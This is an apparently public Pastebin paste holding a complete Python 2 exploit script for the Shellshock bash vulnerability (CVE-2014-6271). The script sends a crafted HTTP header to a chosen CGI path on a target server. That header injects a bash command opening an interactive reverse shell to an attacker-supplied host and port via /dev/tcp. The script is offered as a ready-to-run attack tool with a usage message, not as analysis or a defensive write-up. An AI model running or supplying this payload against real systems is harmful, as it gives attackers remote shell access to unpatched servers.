Guest User

Untitled

a guest
Sep 24th, 2014
80,153
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #
  2. #CVE-2014-6271 cgi-bin reverse shell
  3. #
  4.  
  5. import httplib,urllib,sys
  6.  
  7. if (len(sys.argv)<4):
  8.     print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
  9.     print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
  10.     exit(0)
  11.  
  12. conn = httplib.HTTPConnection(sys.argv[1])
  13. reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
  14.  
  15. headers = {"Content-type": "application/x-www-form-urlencoded",
  16.     "test":reverse_shell }
  17. conn.request("GET",sys.argv[2],headers=headers)
  18. res = conn.getresponse()
  19. print res.status, res.reason
  20. data = res.read()
  21. print data
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×